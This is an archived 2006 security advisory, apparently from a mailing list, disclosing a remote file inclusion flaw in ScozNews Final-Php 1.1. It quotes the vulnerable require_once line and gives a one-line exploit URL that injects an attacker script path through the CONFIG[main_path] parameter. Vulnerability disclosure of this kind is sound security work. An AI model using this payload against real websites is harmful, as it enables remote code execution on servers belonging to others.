Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21038] CzarNews "tpath" File Inclusion Vulnerability

SubberZ[Lite] - Remote File Include

perForms  <= 1.0 ([mosConfig_absol ute_path]) Remote File Inclusion

flatnuke <= 2.5.7 arbitrary php file upload

From:	x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:	14.07.2006
Subject:	ScozNews Final-Php <=1.1 Remote File Inclusion Vulnerability

ScozNews Final-Php <=1.1 Remote File Inclusion Vulnerability


------------------------------------------


Discoverd By: XORON

------------------------------------------


cont@ct: x0r0n[at]hotmail[dot]com

------------------------------------------


script site: www.scoznet.com

------------------------------------------

Exploit: http://sitename.com/[path]/sources/functions.php?CONFIG[main_path]=evil_script

------------------------------------------

Code: require_once($CONFIG['main_path']."/lang/".
$CONFIG['lang']."/lang_functions.php")

------------------------------------------

# XORON - WWW.CYBER-WARRIOR.ORG -